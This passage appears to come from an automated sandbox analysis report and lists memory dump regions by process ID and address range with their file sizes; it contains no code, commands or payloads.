memory/804-180-0x000007FEBF8D0000-0x000007FEBF8E0000-memory.dmpFilesize
64KB
-
memory/832-478-0x0000000000000000-mapping.dmp
-
memory/832-79-0x0000000000000000-mapping.dmp
-
memory/852-205-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/852-198-0x0000000000970000-0x000000000099A000-memory.dmpFilesize
168KB
-
memory/872-74-0x0000000000000000-mapping.dmp
-
memory/876-211-0x00000000009E0000-0x0000000000A0A000-memory.dmpFilesize
168KB
-
memory/876-293-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/928-317-0x0000000000000000-mapping.dmp
-
memory/928-93-0x0000000000000000-mapping.dmp
-
memory/960-248-0x00000000007A0000-0x00000000007CA000-memory.dmpFilesize
168KB
-
memory/960-251-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/972-423-0x0000000000000000-mapping.dmp
-
memory/1040-294-0x0000000000920000-0x000000000094A000-memory.dmpFilesize
168KB
-
memory/1052-301-0x0000000000140000-0x000000000016A000-memory.dmpFilesize
168KB
-
memory/1052-302-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/1108-444-0x0000000000000000-mapping.dmp
-
memory/1132-88-0x0000000000000000-mapping.dmp
-
memory/1136-98-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1136-305-0x0000000000470000-0x000000000049A000-memory.dmpFilesize
168KB
-
memory/1136-307-0x00000000013C4000-0x00000000013C7000-memory.dmpFilesize
12KB
-
memory/1136-304-0x0000000000410000-0x000000000043A000-memory.dmpFilesize
168KB
-
memory/1136-282-0x0000000000000000-mapping.dmp
-
memory/1136-97-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1136-100-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1136-102-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1136-103-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1136-104-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1136-105-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1136-107-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1136-108-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1136-109-0x0000000140001844-mapping.dmp
-
memory/1136-111-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1136-113-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1144-126-0x000000013FA20000-0x000000013FCD6000-memory.dmpFilesize
2.7MB
-
memory/1144-123-0x0000000000000000-mapping.dmp
-
memory/1144-303-0x0000000000F80000-0x0000000000FAA000-memory.dmpFilesize
168KB
-
memory/1156-435-0x0000000000000000-mapping.dmp
-
memory/1180-314-0x0000000000000000-mapping.dmp
-
memory/1208-81-0x0000000000000000-mapping.dmp
-
memory/1216-450-0x0000000000000000-mapping.dmp
-
memory/1228-521-0x0000000000000000-mapping.dmp
-
memory/1256-230-0x0000000001D70000-0x0000000001D9A000-memory.dmpFilesize
168KB
-
memory/1256-233-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/1296-321-0x0000000000000000-mapping.dmp
-
memory/1304-78-0x0000000000000000-mapping.dmp
-
memory/1324-119-0x0000000000000000-mapping.dmp
-
memory/1340-236-0x00000000001D0000-0x00000000001FA000-memory.dmpFilesize
168KB
-
memory/1340-239-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/1356-62-0x000007FEECAA0000-0x000007FEED5FD000-memory.dmpFilesize
11.4MB
-
memory/1356-66-0x00000000027AB000-0x00000000027CA000-memory.dmpFilesize
124KB
-
memory/1356-65-0x00000000027A4000-0x00000000027A7000-memory.dmpFilesize
12KB
-
memory/1356-64-0x000000001B7E0000-0x000000001BADF000-memory.dmpFilesize
3.0MB
-
memory/1356-63-0x00000000027A4000-0x00000000027A7000-memory.dmpFilesize
12KB
-
memory/1356-61-0x000007FEED600000-0x000007FEEE023000-memory.dmpFilesize
10.1MB
-
memory/1356-59-0x0000000000000000-mapping.dmp
-
memory/1360-83-0x0000000000000000-mapping.dmp
-
memory/1360-506-0x0000000000000000-mapping.dmp
-
memory/1376-515-0x0000000000000000-mapping.dmp
-
memory/1384-245-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/1384-241-0x0000000002560000-0x000000000258A000-memory.dmpFilesize
168KB
-
memory/1408-73-0x0000000000000000-mapping.dmp
-
memory/1456-384-0x0000000000000000-mapping.dmp
-
memory/1476-71-0x0000000000000000-mapping.dmp
-
memory/1492-87-0x0000000000000000-mapping.dmp
-
memory/1500-289-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1500-67-0x0000000000000000-mapping.dmp
-
memory/1500-134-0x00000001400033F4-mapping.dmp
-
memory/1500-136-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1500-139-0x00000000778D0000-0x00000000779EF000-memory.dmpFilesize
1.1MB
-
memory/1500-162-0x0000000077AF0000-0x0000000077C99000-memory.dmpFilesize
1.7MB
-
memory/1500-261-0x0000000000400000-0x000000000042A000-memory.dmpFilesize
168KB
-
memory/1500-133-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1500-137-0x0000000077AF0000-0x0000000077C99000-memory.dmpFilesize
1.7MB
-
memory/1504-82-0x0000000000000000-mapping.dmp
-
memory/1536-80-0x0000000000000000-mapping.dmp
-
memory/1544-343-0x0000000000000000-mapping.dmp
-
memory/1560-92-0x0000000000000000-mapping.dmp
-
memory/1600-95-0x0000000000000000-mapping.dmp
-
memory/1600-527-0x0000000000000000-mapping.dmp
-
memory/1608-94-0x0000000000000000-mapping.dmp
-
memory/1612-500-0x0000000000000000-mapping.dmp
-
memory/1632-70-0x0000000000000000-mapping.dmp
-
memory/1640-116-0x0000000000000000-mapping.dmp
-
memory/1684-57-0x0000000000650000-0x0000000000656000-memory.dmpFilesize
24KB
-
memory/1684-58-0x000007FEFC341000-0x000007FEFC343000-memory.dmpFilesize
8KB
-
memory/1684-96-0x00000000025A0000-0x00000000025A6000-memory.dmpFilesize
24KB
-
memory/1684-54-0x000000013FC20000-0x000000013FED6000-memory.dmpFilesize
2.7MB
-
memory/1684-55-0x0000000000640000-0x0000000000646000-memory.dmpFilesize
24KB
-
memory/1684-56-0x000000001C9D0000-0x000000001CC74000-memory.dmpFilesize
2.6MB
-
memory/1692-68-0x0000000000000000-mapping.dmp
-
memory/1712-89-0x0000000000000000-mapping.dmp
-
memory/1720-401-0x0000000000000000-mapping.dmp
-
memory/1768-91-0x0000000000000000-mapping.dmp
-
memory/1772-117-0x0000000000000000-mapping.dmp
-
memory/1804-69-0x0000000000000000-mapping.dmp
-
memory/1836-494-0x0000000000000000-mapping.dmp
-
memory/1908-456-0x0000000000000000-mapping.dmp
-
memory/1928-296-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/1928-256-0x00000000007B0000-0x00000000007DA000-memory.dmpFilesize
168KB
-
memory/1964-75-0x0000000000000000-mapping.dmp
-
memory/1964-115-0x0000000000000000-mapping.dmp
-
memory/1968-85-0x0000000000000000-mapping.dmp
-
memory/1976-429-0x0000000000000000-mapping.dmp
-
memory/1988-267-0x0000000074AF0000-0x000000007509B000-memory.dmpFilesize
5.7MB
-
memory/1988-127-0x0000000076401000-0x0000000076403000-memory.dmpFilesize
8KB
-
memory/1988-122-0x0000000000000000-mapping.dmp
-
memory/1988-153-0x0000000074AF0000-0x000000007509B000-memory.dmpFilesize
5.7MB
-
memory/1988-84-0x0000000000000000-mapping.dmp
-
memory/1988-224-0x0000000077CD0000-0x0000000077E50000-memory.dmpFilesize
1.5MB
-
memory/1988-269-0x0000000077CD0000-0x0000000077E50000-memory.dmpFilesize
1.5MB
-
memory/1992-132-0x00000000778D0000-0x00000000779EF000-memory.dmpFilesize
1.1MB
-
memory/1992-131-0x0000000077AF0000-0x0000000077C99000-memory.dmpFilesize
1.7MB
-
memory/1992-130-0x000007FEED4F0000-0x000007FEEE04D000-memory.dmpFilesize
11.4MB
-
memory/1992-138-0x0000000001114000-0x0000000001117000-memory.dmpFilesize
12KB
-
memory/1992-140-0x000000000111B000-0x000000000113A000-memory.dmpFilesize
124KB
-
memory/1992-141-0x0000000077AF0000-0x0000000077C99000-memory.dmpFilesize
1.7MB
-
memory/1992-129-0x000007FEEE050000-0x000007FEEEA73000-memory.dmpFilesize
10.1MB
-
memory/1992-143-0x00000000778D0000-0x00000000779EF000-memory.dmpFilesize
1.1MB
-
memory/1992-120-0x0000000000000000-mapping.dmp
-
memory/1992-357-0x0000000000000000-mapping.dmp
-
memory/2012-76-0x0000000000000000-mapping.dmp
-
memory/2024-306-0x0000000000750000-0x000000000077A000-memory.dmpFilesize
168KB